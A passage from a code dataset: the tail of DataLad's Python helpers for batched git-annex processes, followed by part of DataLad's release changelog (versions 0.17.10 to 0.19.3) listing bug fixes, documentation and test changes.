instances of annex for\n a repository\n \"\"\"\n def __init__(self, batch_size=0, git_options=None):\n self.batch_size = batch_size\n self.git_options = git_options or []\n super(BatchedAnnexes, self).__init__()\n\n def get(self, codename, annex_cmd=None, **kwargs) -> BatchedAnnex:\n if annex_cmd is None:\n annex_cmd = codename\n\n git_options = self.git_options + kwargs.pop('git_options', [])\n if self.batch_size:\n git_options += ['-c', 'annex.queuesize=%d' % self.batch_size]\n\n # START RF/BF: extend codename to respect different options the process\n # is running with\n # TODO: Eventually there should be more RF'ing, since the actually used\n # codenames are partially reflecting this already. Any options used\n # therein should go away, since they are now automatically included.\n options = kwargs.copy()\n options['git_options'] = git_options\n options['annex_cmd'] = annex_cmd\n for key in options:\n codename += ':{0}:{1}'.format(key, options[key])\n # END RF/BF\n\n if codename not in self:\n # Create a new git-annex process we will keep around\n self[codename] = BatchedAnnex(annex_cmd,\n git_options=git_options,\n **kwargs)\n return self[codename]\n\n def clear(self):\n \"\"\"Override just to make sure we don't rely on __del__ to close all\n the pipes\"\"\"\n self.close()\n super(BatchedAnnexes, self).clear()\n\n def close(self):\n \"\"\"Close communication to all the batched annexes\n\n It does not remove them from the dictionary though\n \"\"\"\n for p in self.values():\n p.close()\n\n\ndef readlines_until_ok_or_failed(stdout, maxlines=100):\n \"\"\"Read stdout until line ends with ok or failed\"\"\"\n out = ''\n i = 0\n lgr.log(3, \"Trying to receive from %s\", stdout)\n while not stdout.closed:\n i += 1\n if maxlines > 0 and i > maxlines:\n raise IOError(\"Expected no more than %d lines. So far received: %r\" % (maxlines, out))\n lgr.log(2, \"Expecting a line\")\n line = stdout.readline()\n lgr.log(2, \"Received line %r\", line)\n out += line\n if re.match(r'^.*\\b(failed|ok)$', line.rstrip()):\n break\n return out.rstrip()\n\n\ndef readline_json(stdout):\n toload = stdout.readline().strip()\n try:\n return json.loads(toload) if toload else {}\n except json.JSONDecodeError:\n lgr.error('Received undecodable JSON output: %s', toload)\n return {}\n" }, { "alpha_fraction": 0.6513754725456238, "alphanum_fraction": 0.6893076300621033, "avg_line_length": 41.83466720581055, "blob_id": "5b6587bb3420d1b61c1a8a181502ebf88b173916", "content_id": "205cead09d996906c478498c71d3b83ef918f89c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 343631, "license_type": "permissive", "max_line_length": 126, "num_lines": 7996, "path": "/docs/source/changelog.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. This file is auto-converted from CHANGELOG.md (make update-changelog) -- do not edit\n\nChange log\n**********\n0.19.3 (2023-08-10)\n===================\n\nBug Fixes\n---------\n\n- Type annotate get_status_dict and note that we can pass Exception or\n CapturedException which is not subclass. `PR\n #7403 <https://github.com/datalad/datalad/pull/7403>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- BF: create-sibling-gitlab used to raise a TypeError when attempting a\n recursive operation in a dataset with uninstalled subdatasets. It now\n raises an impossible result instead. `PR\n #7430 <https://github.com/datalad/datalad/pull/7430>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- Pass branch option into recursive call within Install - for the cases\n whenever install is invoked with URL(s). Fixes\n `#7461 <https://github.com/datalad/datalad/issues/7461>`__ via `PR\n #7463 <https://github.com/datalad/datalad/pull/7463>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Allow for reckless=ephemeral clone using relative path for the\n original location. Fixes\n `#7469 <https://github.com/datalad/datalad/issues/7469>`__ via `PR\n #7472 <https://github.com/datalad/datalad/pull/7472>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\nDocumentation\n-------------\n\n- Fix a property name and default costs described in “getting\n subdatasets” section of ``get`` documentation. Fixes\n `#7458 <https://github.com/datalad/datalad/issues/7458>`__ via `PR\n #7460 <https://github.com/datalad/datalad/pull/7460>`__ (by\n `@mslw <https://github.com/mslw>`__)\n\nInternal\n--------\n\n- Copy an adjusted environment only if requested to do so. `PR\n #7399 <https://github.com/datalad/datalad/pull/7399>`__ (by\n `@christian-monch <https://github.com/christian-monch>`__)\n\n- Eliminate uses of ``pkg_resources``. Fixes\n `#7435 <https://github.com/datalad/datalad/issues/7435>`__ via `PR\n #7439 <https://github.com/datalad/datalad/pull/7439>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\nTests\n-----\n\n- Disable some S3 tests of their VCR taping where they fail for known\n issues. `PR #7467 <https://github.com/datalad/datalad/pull/7467>`__\n (by `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _section-1:\n\n0.19.2 (2023-07-03)\n===================\n\n.. _bug-fixes-1:\n\nBug Fixes\n---------\n\n- Remove surrounding quotes in output filenames even for newer version\n of annex. Fixes\n `#7440 <https://github.com/datalad/datalad/issues/7440>`__ via `PR\n #7443 <https://github.com/datalad/datalad/pull/7443>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _documentation-1:\n\nDocumentation\n-------------\n\n- DOC: clarify description of the “install” interface to reflect its\n convoluted behavior. `PR\n #7445 <https://github.com/datalad/datalad/pull/7445>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _section-2:\n\n0.19.1 (2023-06-26)\n===================\n\n.. _internal-1:\n\nInternal\n--------\n\n- Make compatible with upcoming release of git-annex (next after\n 10.20230407) and pass explicit core.quotepath=false to all git calls.\n Also added ``tools/find-hanged-tests`` helper. `PR\n #7372 <https://github.com/datalad/datalad/pull/7372>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _tests-1:\n\nTests\n-----\n\n- Adjust tests for upcoming release of git-annex (next after\n 10.20230407) and ignore DeprecationWarning for pkg_resources for now.\n `PR #7372 <https://github.com/datalad/datalad/pull/7372>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _section-3:\n\n0.19.0 (2023-06-14)\n===================\n\nEnhancements and New Features\n-----------------------------\n\n- Address gitlab API special character restrictions. `PR\n #7407 <https://github.com/datalad/datalad/pull/7407>`__ (by\n `@jsheunis <https://github.com/jsheunis>`__)\n\n- BF: The default layout of create-sibling-gitlab is now\n ``collection``. The previous default, ``hierarchy`` has been removed\n as it failed in –recursive mode in different edgecases. For\n single-level datasets, the outcome of ``collection`` and\n ``hierarchy`` is identical. `PR\n #7410 <https://github.com/datalad/datalad/pull/7410>`__ (by\n `@jsheunis <https://github.com/jsheunis>`__ and\n `@adswa <https://github.com/adswa>`__)\n\n.. _bug-fixes-2:\n\nBug Fixes\n---------\n\n- WTF - bring back and extend information on metadata extractors etc,\n and allow for sections to have subsections and be selected at both\n levels `PR #7309 <https://github.com/datalad/datalad/pull/7309>`__\n (by `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- BF: Run an actual git invocation with interactive commit config. `PR\n #7398 <https://github.com/datalad/datalad/pull/7398>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\nDependencies\n------------\n\n- Raise minimal version of tqdm (progress bars) to v.4.32.0 `PR\n #7330 <https://github.com/datalad/datalad/pull/7330>`__ (by\n `@mslw <https://github.com/mslw>`__)\n\n.. _documentation-2:\n\nDocumentation\n-------------\n\n- DOC: Add a “User messaging” design doc. `PR\n #7310 <https://github.com/datalad/datalad/pull/7310>`__ (by\n `@jsheunis <https://github.com/jsheunis>`__)\n\n.. _tests-2:\n\nTests\n-----\n\n- Remove nose-based testing utils and possibility to test extensions\n using nose. `PR\n #7261 <https://github.com/datalad/datalad/pull/7261>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _section-4:\n\n0.18.5 (2023-06-13)\n===================\n\n.. _bug-fixes-3:\n\nBug Fixes\n---------\n\n- More correct summary reporting for relaxed (no size) –annex. `PR\n #7050 <https://github.com/datalad/datalad/pull/7050>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- ENH: minor tune up of addurls to be more tolerant and “informative”.\n `PR #7388 <https://github.com/datalad/datalad/pull/7388>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Ensure that data generated by timeout handlers in the asynchronous\n runner are accessible via the result generator, even if no other\n other events occur. `PR\n #7390 <https://github.com/datalad/datalad/pull/7390>`__ (by\n `@christian-monch <https://github.com/christian-monch>`__)\n\n- Do not map (leave as is) trailing / or  in github URLs. `PR\n #7418 <https://github.com/datalad/datalad/pull/7418>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _documentation-3:\n\nDocumentation\n-------------\n\n- Use ``sphinx_autodoc_typehints``. Fixes\n `#7404 <https://github.com/datalad/datalad/issues/7404>`__ via `PR\n #7412 <https://github.com/datalad/datalad/pull/7412>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n.. _internal-2:\n\nInternal\n--------\n\n- Discontinue ConfigManager abuse for Git identity warning. `PR\n #7378 <https://github.com/datalad/datalad/pull/7378>`__ (by\n `@mih <https://github.com/mih>`__) and `PR\n #7392 <https://github.com/datalad/datalad/pull/7392>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _tests-3:\n\nTests\n-----\n\n- Boost python to 3.8 during extensions testing. `PR\n #7413 <https://github.com/datalad/datalad/pull/7413>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Skip test_system_ssh_version if no ssh found + split parsing into\n separate test. `PR\n #7422 <https://github.com/datalad/datalad/pull/7422>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _section-5:\n\n0.18.4 (2023-05-16)\n===================\n\n.. _bug-fixes-4:\n\nBug Fixes\n---------\n\n- Provider config files were ignored, when CWD changed between\n different datasets during runtime. Fixes\n `#7347 <https://github.com/datalad/datalad/issues/7347>`__ via `PR\n #7357 <https://github.com/datalad/datalad/pull/7357>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _documentation-4:\n\nDocumentation\n-------------\n\n- Added a workaround for an issue with documentation theme (search\n function not working on Read the Docs). Fixes\n `#7374 <https://github.com/datalad/datalad/issues/7374>`__ via `PR\n #7385 <https://github.com/datalad/datalad/pull/7385>`__ (by\n `@mslw <https://github.com/mslw>`__)\n\n.. _internal-3:\n\nInternal\n--------\n\n- Type-annotate ``datalad/support/gitrepo.py``. `PR\n #7341 <https://github.com/datalad/datalad/pull/7341>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n.. _tests-4:\n\nTests\n-----\n\n- Fix failing testing on CI `PR\n #7379 <https://github.com/datalad/datalad/pull/7379>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n - use sample S3 url DANDI archive,\n - use our copy of old .deb from datasets.datalad.org instead of\n snapshots.d.o\n - use specific miniconda installer for py 3.7.\n\n.. _section-6:\n\n0.18.3 (2023-03-25)\n===================\n\n.. _bug-fixes-5:\n\nBug Fixes\n---------\n\n- Fixed that the ``get`` command would fail, when subdataset\n source-candidate-templates where using the ``path`` property from\n ``.gitmodules``. Also enhance the respective documentation for the\n ``get`` command. Fixes\n `#7274 <https://github.com/datalad/datalad/issues/7274>`__ via `PR\n #7280 <https://github.com/datalad/datalad/pull/7280>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- Improve up-to-dateness of config reports across manager instances.\n Fixes `#7299 <https://github.com/datalad/datalad/issues/7299>`__ via\n `PR #7301 <https://github.com/datalad/datalad/pull/7301>`__ (by\n `@mih <https://github.com/mih>`__)\n\n- BF: GitRepo.merge do not allow merging unrelated unconditionally. `PR\n #7312 <https://github.com/datalad/datalad/pull/7312>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Do not render (empty) WTF report on other records. `PR\n #7322 <https://github.com/datalad/datalad/pull/7322>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Fixed a bug where changing DataLad’s log level could lead to failing\n git-annex calls. Fixes\n `#7328 <https://github.com/datalad/datalad/issues/7328>`__ via `PR\n #7329 <https://github.com/datalad/datalad/pull/7329>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- Fix an issue with uninformative error reporting by the datalad\n special remote. Fixes\n `#7332 <https://github.com/datalad/datalad/issues/7332>`__ via `PR\n #7333 <https://github.com/datalad/datalad/pull/7333>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- Fix save to not force committing into git if reference dataset is\n pure git (not git-annex). Fixes\n `#7351 <https://github.com/datalad/datalad/issues/7351>`__ via `PR\n #7355 <https://github.com/datalad/datalad/pull/7355>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _documentation-5:\n\nDocumentation\n-------------\n\n- Include a few previously missing commands in html API docs. Fixes\n `#7288 <https://github.com/datalad/datalad/issues/7288>`__ via `PR\n #7289 <https://github.com/datalad/datalad/pull/7289>`__ (by\n `@mslw <https://github.com/mslw>`__)\n\n.. _internal-4:\n\nInternal\n--------\n\n- Type-annotate almost all of ``datalad/utils.py``; add\n ``datalad/typing.py``. `PR\n #7317 <https://github.com/datalad/datalad/pull/7317>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n- Type-annotate and fix ``datalad/support/strings.py``. `PR\n #7318 <https://github.com/datalad/datalad/pull/7318>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n- Type-annotate ``datalad/support/globbedpaths.py``. `PR\n #7327 <https://github.com/datalad/datalad/pull/7327>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n- Extend type-annotations for ``datalad/support/path.py``. `PR\n #7336 <https://github.com/datalad/datalad/pull/7336>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n- Type-annotate various things in ``datalad/runner/``. `PR\n #7337 <https://github.com/datalad/datalad/pull/7337>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n- Type-annotate some more files in ``datalad/support/``. `PR\n #7339 <https://github.com/datalad/datalad/pull/7339>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n.. _tests-5:\n\nTests\n-----\n\n- Skip or xfail some currently failing or stalling tests. `PR\n #7331 <https://github.com/datalad/datalad/pull/7331>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Skip with_sameas_remote when rsync and annex are incompatible. Fixes\n `#7320 <https://github.com/datalad/datalad/issues/7320>`__ via `PR\n #7342 <https://github.com/datalad/datalad/pull/7342>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- Fix testing assumption - do create pure GitRepo superdataset and test\n against it. `PR\n #7353 <https://github.com/datalad/datalad/pull/7353>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _section-7:\n\n0.18.2 (2023-02-27)\n===================\n\n.. _bug-fixes-6:\n\nBug Fixes\n---------\n\n- Fix ``create-sibling`` for non-English SSH remotes by providing\n ``LC_ALL=C`` for the ``ls`` call. `PR\n #7265 <https://github.com/datalad/datalad/pull/7265>`__ (by\n `@nobodyinperson <https://github.com/nobodyinperson>`__)\n\n- Fix EnsureListOf() and EnsureTupleOf() for string inputs. `PR\n #7267 <https://github.com/datalad/datalad/pull/7267>`__ (by\n `@nobodyinperson <https://github.com/nobodyinperson>`__)\n\n- create-sibling: Use C.UTF-8 locale instead of C on the remote end.\n `PR #7273 <https://github.com/datalad/datalad/pull/7273>`__ (by\n `@nobodyinperson <https://github.com/nobodyinperson>`__)\n\n- Address compatibility with most recent git-annex where info would\n exit with non-0. `PR\n #7292 <https://github.com/datalad/datalad/pull/7292>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _dependencies-1:\n\nDependencies\n------------\n\n- Revert “Revert”Remove chardet version upper limit\"\". `PR\n #7263 <https://github.com/datalad/datalad/pull/7263>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _internal-5:\n\nInternal\n--------\n\n- Codespell more (CHANGELOGs etc) and remove custom CLI options from\n tox.ini. `PR #7271 <https://github.com/datalad/datalad/pull/7271>`__\n (by `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _tests-6:\n\nTests\n-----\n\n- Use older python 3.8 in testing nose utils in github-action\n test-nose. Fixes\n `#7259 <https://github.com/datalad/datalad/issues/7259>`__ via `PR\n #7260 <https://github.com/datalad/datalad/pull/7260>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _section-8:\n\n0.18.1 (2023-01-16)\n===================\n\n.. _bug-fixes-7:\n\nBug Fixes\n---------\n\n- Fixes crashes on windows where DataLad was mistaking git-annex\n 10.20221212 for a not yet released git-annex version and trying to\n use a new feature. Fixes\n `#7248 <https://github.com/datalad/datalad/issues/7248>`__ via `PR\n #7249 <https://github.com/datalad/datalad/pull/7249>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _documentation-6:\n\nDocumentation\n-------------\n\n- DOC: fix EnsureCallable docstring. `PR\n #7245 <https://github.com/datalad/datalad/pull/7245>`__ (by\n `@matrss <https://github.com/matrss>`__)\n\nPerformance\n-----------\n\n- Integrate buffer size optimization from datalad-next, leading to\n significant performance improvement for status and diff. Fixes\n `#7190 <https://github.com/datalad/datalad/issues/7190>`__ via `PR\n #7250 <https://github.com/datalad/datalad/pull/7250>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _section-9:\n\n0.18.0 (2022-12-31)\n===================\n\nBreaking Changes\n----------------\n\n- Move all old-style metadata commands ``aggregate_metadata``,\n ``search``, ``metadata`` and ``extract-metadata``, as well as the\n ``cfg_metadatatypes`` procedure and the old metadata extractors into\n the datalad-deprecated extension. Now recommended way of handling\n metadata is to install the datalad-metalad extension instead. Fixes\n `#7012 <https://github.com/datalad/datalad/issues/7012>`__ via `PR\n #7014 <https://github.com/datalad/datalad/pull/7014>`__\n\n- Automatic reconfiguration of the ORA special remote when cloning from\n RIA stores now only applies locally rather than being committed. `PR\n #7235 <https://github.com/datalad/datalad/pull/7235>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _enhancements-and-new-features-1:\n\nEnhancements and New Features\n-----------------------------\n\n- A repository description can be specified with a new\n ``--description`` option when creating siblings using\n ``create-sibling-[gin|gitea|github|gogs]``. Fixes\n `#6816 <https://github.com/datalad/datalad/issues/6816>`__ via `PR\n #7109 <https://github.com/datalad/datalad/pull/7109>`__ (by\n `@mslw <https://github.com/mslw>`__)\n\n- Make validation failure of alternative constraints more informative.\n Fixes `#7092 <https://github.com/datalad/datalad/issues/7092>`__ via\n `PR #7132 <https://github.com/datalad/datalad/pull/7132>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- Saving removed dataset content was sped-up, and reporting of types of\n removed content now accurately states ``dataset`` for added and\n removed subdatasets, instead of ``file``. Moreover, saving previously\n staged deletions is now also reported. `PR\n #6784 <https://github.com/datalad/datalad/pull/6784>`__ (by\n `@mih <https://github.com/mih>`__)\n\n- ``foreach-dataset`` command got a new possible value for the\n –output-streamns|–o-s option ‘relpath’ to capture and pass-through\n prefixing with path to subds. Very handy for e.g. running\n ``git grep`` command across subdatasets. `PR\n #7071 <https://github.com/datalad/datalad/pull/7071>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- New config\n ``datalad.create-sibling-ghlike.extra-remote-settings.NETLOC.KEY=VALUE``\n allows to add and/or overwrite local configuration for the created\n sibling by the commands\n ``create-sibling-<gin|gitea|github|gitlab|gogs>``. `PR\n #7213 <https://github.com/datalad/datalad/pull/7213>`__ (by\n `@matrss <https://github.com/matrss>`__)\n\n- The ``siblings`` command does not concern the user with messages\n about inconsequential failure to annex-enable a remote anymore. `PR\n #7217 <https://github.com/datalad/datalad/pull/7217>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- ORA special remote now allows to override its configuration locally.\n `PR #7235 <https://github.com/datalad/datalad/pull/7235>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- Added a ‘ria’ special remote to provide backwards compatibility with\n datasets that were set up with the deprecated\n `ria-remote <https://github.com/datalad/git-annex-ria-remote>`__. `PR\n #7235 <https://github.com/datalad/datalad/pull/7235>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _bug-fixes-8:\n\nBug Fixes\n---------\n\n- When ``create-sibling-ria`` was invoked with a sibling name of a\n pre-existing sibling, a duplicate key in the result record caused a\n crashed. Fixes\n `#6950 <https://github.com/datalad/datalad/issues/6950>`__ via `PR\n #6952 <https://github.com/datalad/datalad/pull/6952>`__ (by\n `@adswa <https://api.github.com/users/adswa>`__)\n\n.. _documentation-7:\n\nDocumentation\n-------------\n\n- create-sibling-ria’s docstring now defines the schema of RIA URLs and\n clarifies internal layout of a RIA store. `PR\n #6861 <https://github.com/datalad/datalad/pull/6861>`__ (by\n `@adswa <https://api.github.com/users/adswa>`__)\n\n- Move maintenance team info from issue to CONTRIBUTING. `PR\n #6904 <https://github.com/datalad/datalad/pull/6904>`__ (by\n `@adswa <https://api.github.com/users/adswa>`__)\n\n- Describe specifications for a DataLad GitHub Action. `PR\n #6931 <https://github.com/datalad/datalad/pull/6931>`__ (by\n `@thewtex <https://api.github.com/users/thewtex>`__)\n\n- Fix capitalization of some service names. `PR\n #6936 <https://github.com/datalad/datalad/pull/6936>`__ (by\n `@aqw <https://api.github.com/users/aqw>`__)\n\n- Command categories in help text are more consistently named. `PR\n #7027 <https://github.com/datalad/datalad/pull/7027>`__ (by\n `@aqw <https://api.github.com/users/aqw>`__)\n\n- DOC: Add design document on Tests and CI. `PR\n #7195 <https://github.com/datalad/datalad/pull/7195>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- CONTRIBUTING.md was extended with up-to-date information on CI\n logging, changelog and release procedures. `PR\n #7204 <https://github.com/datalad/datalad/pull/7204>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _internal-6:\n\nInternal\n--------\n\n- Allow EnsureDataset constraint to handle Path instances. Fixes\n `#7069 <https://github.com/datalad/datalad/issues/7069>`__ via `PR\n #7133 <https://github.com/datalad/datalad/pull/7133>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- Use ``looseversion.LooseVersion`` as drop-in replacement for\n ``distutils.version.LooseVersion`` Fixes\n `#6307 <https://github.com/datalad/datalad/issues/6307>`__ via `PR\n #6839 <https://github.com/datalad/datalad/pull/6839>`__ (by\n `@effigies <https://api.github.com/users/effigies>`__)\n\n- Use –pathspec-from-file where possible instead of passing long lists\n of paths to git/git-annex calls. Fixes\n `#6922 <https://github.com/datalad/datalad/issues/6922>`__ via `PR\n #6932 <https://github.com/datalad/datalad/pull/6932>`__ (by\n `@yarikoptic <https://api.github.com/users/yarikoptic>`__)\n\n- Make clone_dataset() better patchable ny extensions and less\n monolithic. `PR\n #7017 <https://github.com/datalad/datalad/pull/7017>`__ (by\n `@mih <https://api.github.com/users/mih>`__)\n\n- Remove ``simplejson`` in favor of using ``json``. Fixes\n `#7034 <https://github.com/datalad/datalad/issues/7034>`__ via `PR\n #7035 <https://github.com/datalad/datalad/pull/7035>`__ (by\n `@christian-monch <https://api.github.com/users/christian-monch>`__)\n\n- Fix an error in the command group names-test. `PR\n #7044 <https://github.com/datalad/datalad/pull/7044>`__ (by\n `@christian-monch <https://api.github.com/users/christian-monch>`__)\n\n- Move eval_results() into interface.base to simplify imports for\n command implementations. Deprecate use from interface.utils\n accordingly. Fixes\n `#6694 <https://github.com/datalad/datalad/issues/6694>`__ via `PR\n #7170 <https://github.com/datalad/datalad/pull/7170>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n.. _performance-1:\n\nPerformance\n-----------\n\n- Use regular dicts instead of OrderedDicts for speedier operations.\n Fixes `#6566 <https://github.com/datalad/datalad/issues/6566>`__ via\n `PR #7174 <https://github.com/datalad/datalad/pull/7174>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- Reimplement ``get_submodules_()`` without ``get_content_info()`` for\n substantial performance boosts especially for large datasets with few\n subdatasets. Originally proposed in `PR\n #6942 <https://github.com/datalad/datalad/pull/6942>`__ by\n `@mih <https://github.com/mih>`__, fixing\n `#6940 <https://github.com/datalad/datalad/issues/6940>`__. `PR\n #7189 <https://github.com/datalad/datalad/pull/7189>`__ (by\n `@adswa <https://github.com/adswa>`__). Complemented with `PR\n #7220 <https://github.com/datalad/datalad/pull/7220>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__) to avoid ``O(N^2)``\n (instead of ``O(N*log(N))`` performance in some cases.\n\n- Use –include=\\* or –anything instead of –copies 0 to speed up\n get_content_annexinfo. `PR\n #7230 <https://github.com/datalad/datalad/pull/7230>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _tests-7:\n\nTests\n-----\n\n- Re-enable two now-passing core test on Windows CI. `PR\n #7152 <https://github.com/datalad/datalad/pull/7152>`__ (by\n `@adswa <https://api.github.com/users/adswa>`__)\n\n- Remove the ``with_testrepos`` decorator and associated tests for it\n Fixes `#6752 <https://github.com/datalad/datalad/issues/6752>`__ via\n `PR #7176 <https://github.com/datalad/datalad/pull/7176>`__ (by\n `@adswa <https://api.github.com/users/adswa>`__)\n\n.. _section-10:\n\n0.17.10 (2022-12-14)\n====================\n\n.. _enhancements-and-new-features-2:\n\nEnhancements and New Features\n-----------------------------\n\n- Enhance concurrent invocation behavior of ``ThreadedRunner.run()``.\n If possible invocations are serialized instead of raising *re-enter*\n runtime errors. Deadlock situations are detected and runtime errors\n are raised instead of deadlocking. Fixes\n `#7138 <https://github.com/datalad/datalad/issues/7138>`__ via `PR\n #7201 <https://github.com/datalad/datalad/pull/7201>`__ (by\n `@christian-monch <https://github.com/christian-monch>`__)\n\n- Exceptions bubbling up through CLI are now reported on including\n their chain of **cause**. Fixes\n `#7163 <https://github.com/datalad/datalad/issues/7163>`__ via `PR\n #7210 <https://github.com/datalad/datalad/pull/7210>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _bug-fixes-9:\n\nBug Fixes\n---------\n\n- BF: read RIA config from stdin instead of temporary file. Fixes\n `#6514 <https://github.com/datalad/datalad/issues/6514>`__ via `PR\n #7147 <https://github.com/datalad/datalad/pull/7147>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- Prevent doomed annex calls on files we already know are untracked.\n Fixes `#7032 <https://github.com/datalad/datalad/issues/7032>`__ via\n `PR #7166 <https://github.com/datalad/datalad/pull/7166>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- Comply to Posix-like clone URL formats on Windows. Fixes\n `#7180 <https://github.com/datalad/datalad/issues/7180>`__ via `PR\n #7181 <https://github.com/datalad/datalad/pull/7181>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- Ensure that paths used in the datalad-url field of .gitmodules are\n posix. Fixes\n `#7182 <https://github.com/datalad/datalad/issues/7182>`__ via `PR\n #7183 <https://github.com/datalad/datalad/pull/7183>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- Bandaids for export-to-figshare to restore functionality. `PR\n #7188 <https://github.com/datalad/datalad/pull/7188>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- Fixes hanging threads when ``close()`` or ``del`` where called in\n ``BatchedCommand`` instances. That could lead to hanging tests if the\n tests used the ``@serve_path_via_http()``-decorator Fixes\n `#6804 <https://github.com/datalad/datalad/issues/6804>`__ via `PR\n #7201 <https://github.com/datalad/datalad/pull/7201>`__ (by\n `@christian-monch <https://github.com/christian-monch>`__)\n\n- Interpret file-URL path components according to the local operating\n system as described in RFC 8089. With this fix,\n ``datalad.network.RI('file:...').localpath`` returns a correct local\n path on Windows if the RI is constructed with a file-URL. Fixes\n `#7186 <https://github.com/datalad/datalad/issues/7186>`__ via `PR\n #7206 <https://github.com/datalad/datalad/pull/7206>`__ (by\n `@christian-monch <https://github.com/christian-monch>`__)\n\n- Fix a bug when retrieving several files from a RIA store via SSH,\n when the annex key does not contain size information. Fixes\n `#7214 <https://github.com/datalad/datalad/issues/7214>`__ via `PR\n #7215 <https://github.com/datalad/datalad/pull/7215>`__ (by\n `@mslw <https://github.com/mslw>`__)\n\n- Interface-specific (python vs CLI) doc generation for commands and\n their parameters was broken when brackets were used within the\n interface markups. Fixes\n `#7225 <https://github.com/datalad/datalad/issues/7225>`__ via `PR\n #7226 <https://github.com/datalad/datalad/pull/7226>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _documentation-8:\n\nDocumentation\n-------------\n\n- Fix documentation of ``Runner.run()`` to not accept strings. Instead,\n encoding must be ensured by the caller. Fixes\n `#7145 <https://github.com/datalad/datalad/issues/7145>`__ via `PR\n #7155 <https://github.com/datalad/datalad/pull/7155>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _internal-7:\n\nInternal\n--------\n\n- Fix import of the ``ls`` command from datalad-deprecated for\n benchmarks. Fixes\n `#7149 <https://github.com/datalad/datalad/issues/7149>`__ via `PR\n #7154 <https://github.com/datalad/datalad/pull/7154>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- Unify definition of parameter choices with ``datalad clean``. Fixes\n `#7026 <https://github.com/datalad/datalad/issues/7026>`__ via `PR\n #7161 <https://github.com/datalad/datalad/pull/7161>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _tests-8:\n\nTests\n-----\n\n- Fix test failure with old annex. Fixes\n `#7157 <https://github.com/datalad/datalad/issues/7157>`__ via `PR\n #7159 <https://github.com/datalad/datalad/pull/7159>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- Re-enable now passing test_path_diff test on Windows. Fixes\n `#3725 <https://github.com/datalad/datalad/issues/3725>`__ via `PR\n #7194 <https://github.com/datalad/datalad/pull/7194>`__ (by\n `@yarikoptic 